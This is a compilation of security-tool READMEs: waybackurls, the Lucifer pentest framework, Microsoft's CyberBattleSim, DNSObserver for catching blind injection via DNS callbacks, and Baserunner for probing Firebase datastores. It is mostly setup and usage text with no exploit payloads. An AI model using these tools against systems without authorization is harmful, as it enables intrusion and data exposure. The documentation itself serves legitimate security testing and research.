We use a super secret kite file format for storing the json schemas from kitebuilder. These are simply protobuf encoded pkg/proute.APIS written to a file. The compilation is used to allow us to quickly deserialize the already parsed wordlist. This file format is not stable, and should only be interacted with using the inbuilt conversion tools for kiterunner.

When a new version of the kite file format is released, you may need to recompile your kite files




Waybackurls - Fetch All The URLs That The Wayback Machine Knows About For A Domain



Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for *.domain and output them on stdout.

Usage example:

▶ cat domains.txt | waybackurls > urls
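Since the output is plain line-delimited URLs on stdout, it composes with standard shell tooling; for example, to de-duplicate results:

▶ cat domains.txt | waybackurls | sort -u > urls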

Install:

▶ go get github.com/tomnomnom/waybackurls


Credit

This tool was inspired by @mhmdiaa's waybackurls.py script. Thanks to them for the great idea!



Lucifer - A Powerful Penetration Tool For Automating Penetration Tasks Such As Local Privilege Escalation, Enumeration, Exfiltration And More...



A Powerful Penetration Tool For Automating Penetration Tasks Such As Local Privilege Escalation, Enumeration, Exfiltration and More... Use Or Build Automation Modules To Speed Up Your Cyber Security Life

Setup
git clone https://github.com/Skiller9090/Lucifer.git
cd Lucifer
pip install -r requirements.txt
python main.py --help

If you want the cutting-edge changes, add -b dev to the end of the git clone https://github.com/Skiller9090/Lucifer.git command, as shown below.
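That is:

git clone https://github.com/Skiller9090/Lucifer.git -b dev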


Commands
Command             Description
help                Displays This Menu
name                Shows name of current shell
id                  Displays current shell's id
show                Shows options or modules based on input, EX: show <options/modules>
options             Shows a list of variables/options already set
set                 Sets a variable or option, EX: set <var_name> <value>
set_vars            Auto-sets needed variables for loaded module
description         Displays description of the module loaded
auto_vars           Displays if auto_vars is True or False for current shell
change_auto_vars    Changes the auto_vars option for one shell, all shells or future shells
reindex             Re-indexes all modules, allows for dynamic additions of modules
use                 Move into a module, EX: use <module>
run                 Runs the current module, can also use exploit to do the same
spawn_shell         Spawns an alternative shell
open_shell          Open a shell by id, EX: open_shell <id>
show_shells         Show all shell ids and attached names
set_name            Sets current shell's name, EX: set_name <name>
set_name_id         Set a shell's name by id, EX: set_name_id <id> <name>
clear               Clear screen
close               Kills current input into opened shell
reset               Resets Everything
exit                Exits the program, can also use quit to do the same

Command Use
  • No-Arg Commands
    • help - to display help menu

    • name - shows name of current shell

    • id - shows current shell id

    • options - shows a table of set options/vars

    • set_vars - automatically sets vars needed for the loaded module (default defined in a module)

    • description - show description of current loaded module

    • auto_vars - displays current setting of auto_vars (auto_vars if true will automatically run set_vars on module load)

    • run - runs the module with the current options, exploit works the same

    • spawn_shell - spawns a new Shell instance

    • show_shells - shows all open shells ids and names

    • clear - clears the terminal/console screen

    • close - kills the input to current shell

    • reset - resets everything (not implemented)

    • exit - quits the program

  • Arg Commands
    • show <options/modules> - displays a list of set options or modules depending on argument.

    • set <var_name> <value> - sets a variable/option

    • change_auto_vars <to_set> <args>:

      • <to_set> - can be true or false (t or f) (-t or -f)

      • <args>:

        • -g = global - sets for all shells spawned

        • -n = new - sets this option for future shell spawns

        • -i = inclusive - no matter what, set current shell to <to_set>

    • use <module> <args>:

      • <module> - path to module

      • <args>:

        • -R - Override cache (reload dynamically)
    • open_shell <id> - opens a shell by its id

    • set_name <name> - set the name of the current shell

    • set_name_id <id> <name> - set the name of the shell specified by <id>
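Putting the commands above together, a typical session inside the Lucifer shell might look like this (the module path and variable name are illustrative, not real module names):

use modules/example_module
set target 192.168.1.10
options
run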


Using Java

Lucifer allows for Python and Java code to work side by side through the use of the LMI.Java extension. For this to work you will need to install jpype1; to do this, run the following command in your Python environment:
pip install jpype1
From here you are free to interact with LMI.Java.compiler and LMI.Java.luciferJVM, which allow you to call Java functions and instantiate Java classes through Python; more documentation of this will be added to the Lucifer wiki later on.


Examples

Settings Variables



Running Module



Settings



Versioning

The standard of versioning on this project is:


MAJOR.MINOR.PATCH.STAGE.BUILD

Major:
  • incremented when either there has been a significant amount of new features since the start of the major, or there is a change so big that it can cause compatibility issues (a Major of 0 means very unstable)
  • Could cause incompatibility issues

Minor:
  • incremented when a new feature or feature-set is added to the project
  • should not cause incompatibility errors due to only additions made

Patch:
  • incremented on bugfixes or if a feature is so small that it is not worth incrementing the minor version
  • very low risk of incompatibility error

Stage:
  • The stage of the current MAJOR.MINOR.PATCH build: either alpha, beta, release candidate or release
  • Indicates how far through development the new MAJOR.MINOR.PATCH is
  • Stage number to name translation:
    • 0 => beta (b)
    • 1 => alpha (a)
    • 2 => release candidate (rc)
    • 3 => release (r)

Build:
  • this should be incremented on every change made to the code, even on a one character change

This version structure can be stored and displayed in a few ways:

  • The best way to store the data within code is via a tuple such as:
    • (Major, Minor, Patch, Stage, Build)
      • Example is: (1, 4, 1, 1, 331)
  • The long display would be:
    • {stage} {major}.{minor}.{patch} Build {build}
      • Example is: Alpha 1.4.1 Build 331
  • The short display would be:
    • {major}.{minor}.{patch}{stage}{build}
      • Example is: 1.4.1a331
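As a quick illustration of the short display form (a throwaway shell one-liner, not part of Lucifer):

printf '%d.%d.%d%s%d\n' 1 4 1 a 331   # prints 1.4.1a331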


CyberBattleSim - An Experimentation And Research Platform To Investigate The Interaction Of Automated Agents In Abstract Simulated Network Environments



CyberBattleSim is an experimentation and research platform to investigate the interaction of automated agents operating in a simulated abstract enterprise network environment. The simulation provides a high-level abstraction of computer networks and cyber security concepts. Its Python-based OpenAI Gym interface allows for training of automated agents using reinforcement learning algorithms.

The simulation environment is parameterized by a fixed network topology and a set of vulnerabilities that agents can utilize to move laterally in the network. The goal of the attacker is to take ownership of a portion of the network by exploiting vulnerabilities that are planted in the computer nodes. While the attacker attempts to spread throughout the network, a defender agent watches the network activity and tries to detect any attack taking place and mitigate the impact on the system by evicting the attacker. We provide a basic stochastic defender that detects and mitigates ongoing attacks based on pre-defined probabilities of success. We implement mitigation by re-imaging the infected nodes, a process abstractly modeled as an operation spanning over multiple simulation steps.

To compare the performance of the agents we look at two metrics: the number of simulation steps taken to attain their goal and the cumulative rewards over simulation steps across training epochs.


Project goals

We view this project as an experimentation platform to conduct research on the interaction of automated agents in abstract simulated network environments. By open sourcing it we hope to encourage the research community to investigate how cyber-agents interact and evolve in such network environments.

The simulation we provide is admittedly simplistic, but this has advantages. Its highly abstract nature prohibits direct application to real-world systems thus providing a safeguard against potential nefarious use of automated agents trained with it. At the same time, its simplicity allows us to focus on specific security aspects we aim to study and quickly experiment with recent machine learning and AI algorithms.

For instance, the current implementation focuses on lateral movement cyber-attack techniques, with the hope of understanding how network topology and configuration affects them. With this goal in mind, we felt that modeling actual network traffic was not necessary. This is just one example of a significant limitation in our system that future contributions might want to address.

On the algorithmic side, we provide some basic agents as starting points, but we would be curious to find out how state-of-the-art reinforcement learning algorithms compare to them. We found that the large action space intrinsic to any computer system is a particular challenge for Reinforcement Learning, in contrast to other applications such as video games or robot control. Training agents that can store and retrieve credentials is another challenge faced when applying RL techniques where agents typically do not feature internal memory. These are other areas of research where the simulation could be used for benchmarking purposes.

Other areas of interest include the responsible and ethical use of autonomous cyber-security systems: How to design an enterprise network that gives an intrinsic advantage to defender agents? How to conduct safe research aimed at defending enterprises against autonomous cyber-attacks while preventing nefarious use of such technology?


Documentation

Read the Quick introduction to the project.


Benchmark

See Benchmark.


Setting up a dev environment

It is strongly recommended to work under a Linux environment, either directly or via WSL on Windows. Running Python on Windows directly should work but is not supported anymore.

Start by checking out the repository:

git clone https://github.com/microsoft/CyberBattleSim.git

On Linux or WSL

The instructions were tested on a Linux Ubuntu distribution (both native and via WSL). Run the following command to set up your dev environment and install all the required dependencies (apt and pip packages):

./init.sh

The script installs python3.8 if not present. If you are running a version of Ubuntu older than 20, it will automatically add an additional apt repository to install python3.8.

The script will create a virtual Python environment under a venv subdirectory; you can then run Python with venv/bin/python.

Note: If you prefer Python from a global installation instead of a virtual environment then you can skip the creation of the virtual environment by running the script with ./init.sh -n. This will instead install all the Python packages on a system-wide installation of Python 3.8.


Windows Subsystem for Linux

The supported dev environment on Windows is via WSL. You first need to install an Ubuntu WSL distribution on your Windows machine, and then proceed with the Linux instructions (next section).


Git authentication from WSL

To authenticate with Git you can either use SSH-based authentication, or alternatively use the credential-helper trick to automatically generate a PAT token. The latter can be done by running the following command under WSL (more info here):

git config --global credential.helper "/mnt/c/Program\ Files/Git/mingw64/libexec/git-core/git-credential-manager.exe"

Docker on WSL

To run your environment within a docker container, we recommend running docker via Windows Subsystem for Linux (WSL) using the following instructions: Installing Docker on Windows under WSL.


Windows (unsupported)

This method is not maintained anymore; please prefer running under a WSL Linux environment instead. But if you insist, start by installing Python 3.8, then run the ./init.ps1 script from a PowerShell prompt.


Getting started quickly using Docker

The quickest method to get up and running is via the Docker container.

NOTE: For licensing reasons, we do not publicly redistribute any build artifact. In particular the docker registry spinshot.azurecr.io referred to in the commands below is kept private to the project maintainers only.

As a workaround, you can recreate the docker image yourself using the provided Dockerfile, publish the resulting image to your own docker registry and replace the registry name in the commands below.
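A rebuild-and-republish sketch under that workaround might look like this (registry and tag names are illustrative):

docker build -t myregistry.example.com/cyberbattle:latest .
docker push myregistry.example.com/cyberbattle:latest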

commit=7c1f8c80bc53353937e3c69b0f5f799ebb2b03ee
docker login spinshot.azurecr.io
docker pull spinshot.azurecr.io/cyberbattle:$commit
docker run -it spinshot.azurecr.io/cyberbattle:$commit cyberbattle/agents/baseline/run.py

Check your environment

Run the following command to run a simulation with a baseline RL agent:

python cyberbattle/agents/baseline/run.py --training_episode_count 1 --eval_episode_count 1 --iteration_count 10 --rewardplot_with 80  --chain_size=20 --ownership_goal 1.0

If everything is setup correctly you should get an output that looks like this:

torch cuda available=True
###### DQL
Learning with: episode_count=1,iteration_count=10,ϵ=0.9,ϵ_min=0.1, ϵ_expdecay=5000,γ=0.015, lr=0.01, replaymemory=10000,
batch=512, target_update=10
## Episode: 1/1 'DQL' ϵ=0.9000, γ=0.015, lr=0.01, replaymemory=10000,
batch=512, target_update=10
Episode 1|Iteration 10|reward: 139.0|Elapsed Time: 0:00:00|###################################################################|
###### Random search
Learning with: episode_count=1,iteration_count=10,ϵ=1.0,ϵ_min=0.0,
## Episode: 1/1 'Random search' ϵ=1.0000,
Episode 1|Iteration 10|reward: 194.0|Elapsed Time: 0:00:00|###################################################################|
simulation ended
Episode duration -- DQN=Red, Random=Green
10.00 ┼
Cumulative rewards -- DQN=Red, Random=Green
194.00 ┼ ╭──╴
174.60 ┤ │
155.20 ┤╭─────╯
135.80 ┤│ ╭──╴
116.40 ┤│ │
97.00 ┤│ ╭╯
77.60 ┤│ │
58.20 ┤╯ ╭──╯
38.80 ┤ │
19.40 ┤ │
0.00 ┼──╯

Jupyter notebooks

To quickly get familiar with the project you can open one of the provided Jupyter notebooks to play interactively with the gym environments. Just start jupyter with jupyter notebook, or venv/bin/jupyter notebook if you are using a virtual environment setup.

The following .py notebooks are best viewed in VSCode or in Jupyter with the Jupytext extension and can easily be converted to .ipynb format if needed:


How to instantiate the Gym environments?

The following code shows how to create an instance of the OpenAI Gym environment CyberBattleChain-v0, an environment based on a chain-like network structure, with 10 nodes (size=10) where the agent's goal is to either gain full ownership of the network (own_atleast_percent=1.0) or break the 80% network availability SLA (maintain_sla=0.80), while the network is being monitored and protected by a basic probabilistically-modelled defender (defender_agent=ScanAndReimageCompromisedMachines):

import gym

import cyberbattle._env.cyberbattle_env
# AttackerGoal, DefenderConstraint and ScanAndReimageCompromisedMachines are
# classes from the cyberbattle package; import them from the relevant modules.

cyberbattlechain_defender = gym.make(
    'CyberBattleChain-v0',
    size=10,
    attacker_goal=AttackerGoal(
        own_atleast=0,
        own_atleast_percent=1.0),
    defender_constraint=DefenderConstraint(
        maintain_sla=0.80),
    defender_agent=ScanAndReimageCompromisedMachines(
        probability=0.6,
        scan_capacity=2,
        scan_frequency=5))

To try other network topologies, take chainpattern.py as an example to define your own set of machines and vulnerabilities, then add an entry in the module initializer to declare and register the Gym environment.


Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.


Ideas for contributions

Here are some ideas on how to contribute: enhance the simulation (event-based, refined simulation, …), train an RL algorithm on the existing simulation, implement benchmarks to evaluate and compare the novelty of agents, add more network generative modes to train RL agents on, contribute to the docs, fix bugs.

See also the wiki for more ideas.


Citing this project
@misc{msft:cyberbattlesim,
  Author = {Microsoft Defender Research Team},
  Note = {Created by Christian Seifert, Michael Betser, William Blum, James Bono, Kate Farris, Emily Goren, Justin Grana, Kristian Holsheimer, Brandon Marken, Joshua Neil, Nicole Nichols, Jugal Parikh, Haoran Wei.},
  Publisher = {GitHub},
  Howpublished = {\url{https://github.com/microsoft/cyberbattlesim}},
  Title = {CyberBattleSim},
  Year = {2021}
}

Note on privacy

This project does not include any customer data. The provided models and network topologies are purely fictitious. Users of the provided code provide all the input to the simulation and must have the necessary permissions to use any provided data.


Trademarks

This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos is subject to those third parties' policies.



DNSObserver - A Handy DNS Service Written In Go To Aid In The Detection Of Several Types Of Blind Vulnerabilities



A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends notifications with the received request's details via Slack. DNSObserver can help you find bugs such as blind OS command injection, blind SQLi, blind XXE, and many more!


For a more detailed overview and setup instructions, see:

https://www.allysonomalley.com/2020/05/22/dnsobserver/


Setup

What you'll need:

  • Your own registered domain name
  • A Virtual Private Server (VPS) to run the script on (I'm using Ubuntu - I have not tested this tool on other systems)
  • [Optional] Your own Slack workspace and a webhook

Domain and DNS Configuration

If you don't already have a VPS ready to use, create a new Linux VPS with your preferred provider. Note down its public IP address.

Register a new domain name with your preferred registrar - any registrar should be fine as long as they allow setting custom name servers and glue records.

Go into your new domain's DNS settings and find the 'glue record' section. Add two entries here, one for each new name server, and supply both with the public IP address of your VPS.

Next, change the default name servers to:

ns1.<YOUR-DOMAIN>
ns2.<YOUR-DOMAIN>

Server Setup

SSH into your VPS, and perform these steps:

  • Install Go if you don't have it already. Installation instructions can be found here

  • Make sure that the default DNS ports are open - 53/UDP and 53/TCP. Run:

     sudo ufw allow 53/udp
     sudo ufw allow 53/tcp
  • Get DNSObserver and its dependencies:

     go get github.com/allyomalley/dnsobserver/...

DNSObserver Configuration

There are two required arguments, and two optional arguments:

domain [REQUIRED]
Your new domain name.

ip [REQUIRED]
Your VPS' public IP address.

webhook [Optional]
If you want to receive notifications, supply your Slack webhook URL. You'll be notified of any lookups of your domain name, or for any subdomains of your domain (I've excluded notifications for queries for any other apex domains and for your custom name servers to avoid excessive or random notifications). If you do not supply a webhook, interactions will be logged to standard output instead. Webhook setup instructions can be found here.

recordsFile [Optional]
By default, DNSObserver will only respond with an answer to queries for your domain name, or either of its name servers. For any other host, it will still notify you of the interaction (as long as it's your domain or a subdomain), but will send back an empty response. If you want DNSObserver to answer to A lookups for certain hosts with an address, you can either edit the config.yml file included in this project, or create your own based on this template:

a_records:
- hostname: ""
ip: ""
- hostname: ""
ip: ""

Currently, the tool only uses A records (in the future I may add CNAME, AAAA, etc.). Here is an example of a complete custom records file:

a_records:
- hostname: "google.com"
ip: "1.2.3.4"
- hostname: "github.com"
ip: "5.6.7.8"

These settings mean that I want to respond to queries for 'google.com' with '1.2.3.4', and queries for 'github.com' with '5.6.7.8'.


Usage

Now, we are ready to start listening! If you want to be able to do other work on your VPS while DNSObserver runs, start up a new tmux session first.
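For example (session name illustrative):

tmux new -s dnsobserver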

For the standard setup, pass in the required arguments and your webhook:

dnsobserver --domain example.com --ip 11.22.33.44 --webhook https://hooks.slack.com/services/XXX/XXX/XXX

To achieve the above, but also include some custom A lookup responses, add the argument for your records file:

dnsobserver --domain example.com --ip 11.22.33.44 --webhook https://hooks.slack.com/services/XXX/XXX/XXX --recordsFile my_records.yml

Assuming you've set everything up correctly, DNSObserver should now be running. To confirm it's working, open up a terminal on your desktop and perform a lookup of your new domain ('example.com' in this demo):

dig example.com

You should now receive a Slack notification with the details of the request!
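To simulate the kind of out-of-band interaction an injection payload would generate, you can also query an arbitrary subdomain (the label here is illustrative):

dig blind-test-1.example.com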



Baserunner - A Tool For Exploring Firebase Datastores

$
0
0

A tool for exploring and exploiting Firebase datastores.


Set up
  1. git clone https://github.com/iosiro/baserunner.git
  2. cd baserunner
  3. npm install
  4. npm run build
  5. npm start
  6. Go to http://localhost:3000 in your browser.

Usage

The Baserunner interface looks like this:



First, use the configuration textbox to load a Firebase configuration JSON structure from the app you'd like to test. It looks like this:

{
"apiKey": "API_KEY",
"authDomain": "PROJECT_ID.firebaseapp.com",
"databaseURL": "https://PROJECT_ID.firebaseio.com",
"projectId": "PROJECT_ID",
"storageBucket": "PROJECT_ID.appspot.com",
"messagingSenderId": "SENDER_ID",
"appId": "APP_ID",
"measurementId": "G-MEASUREMENT_ID"
}

Then log in as a regular user, either with email and password or with a mobile phone number. When logging in with a mobile phone number, complete the CAPTCHA before submitting your number. You will then be prompted for an OTP from your SMS. Enter this without completing the CAPTCHA to finish logging in. Note that you can skip this step to test queries without authentication.

Finally, you can use the query interface to submit queries to the application's Cloud Firestore. Baserunner provides a number of template queries for common actions. Click on one of them to load it in the textbox, and replace the values that look ==LIKE THIS== with valid names of collections, IDs, fields, etc.

As there is no way of getting a list of available collections using the Firebase JavaScript SDK, you will need to guess these, or source their names from the application's front-end JavaScript; one approach is sketched below.
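One way to hunt for candidate collection names is to grep the front-end JavaScript for Firestore collection() calls, for example (URL illustrative):

curl -s https://target.example/app.js | grep -oE 'collection\("[^"]+"\)' | sort -u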


FAQ

How do I tell if an app is using Cloud Firestore or Realtime Database?

Applications using Realtime Database will have a databaseURL key in their configuration objects. Applications without this key can be assumed to use Cloud Firestore. Note that it is possible for Firebase applications to use both datastores, so when in doubt, run both types of queries.

I'm getting blocked by CORS!

To function as intended, Baserunner expects applications to accept requests from localhost, which is enabled by default. Therefore, Baserunner cannot be used as a hosted application.

Should requests from localhost be disallowed by the application you're testing, a version of Baserunner with a reduced featureset can still be run by opening dist/index.html in your browser. Note that this way of running Baserunner only supports email + password login and not phone login.

How do I know what collections to query for?

Cloud Firestore: For security reasons, Firebase's client-side JavaScript API does not provide a mechanism for listing collections. You will need to deduce these from looking at the target application's JavaScript code and making educated guesses.

Realtime Database: As this datastore is represented as a JSON object, you can use the provided "[Realtime Database] Read datastore" query to attempt to view the entire thing. Note that this may fail depending on the rules configured.

Can I see the results of previous queries?

While only the latest query result is displayed on the Baserunner page, all results are logged to the browser console.

When running Realtime Database queries, I get an error that says the client is offline.

Try rerunning the query.


